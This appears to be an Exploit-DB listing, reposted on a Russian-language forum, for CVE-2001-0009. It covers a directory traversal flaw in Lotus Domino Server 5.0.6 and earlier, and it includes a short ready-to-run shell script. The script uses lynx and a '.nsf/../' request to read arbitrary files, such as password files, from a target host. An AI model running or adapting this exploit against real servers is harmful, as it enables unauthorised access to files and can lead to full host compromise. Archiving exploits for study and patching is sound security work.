- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 20530
- Проверка EDB
-
- Пройдено
- Автор
- GEORGI GUNINSKI
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2001-0009
- Дата публикации
- 2001-01-05
Код:
source: https://www.securityfocus.com/bid/2173/info
It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.
Successful exploitation of this vulnerability could enable a remote user to gain access to systems files, password files, etc. This could lead to a complete compromise of the host.
#!/bin/sh
HOST=$1
PATH=$2
start()
{
/usr/bin/lynx -dump http://$HOST/.nsf/../$PATH
}
if [ -n "$HOST" ]; then
start
else
echo "$0 <host> <path>"
fi
- Источник
- www.exploit-db.com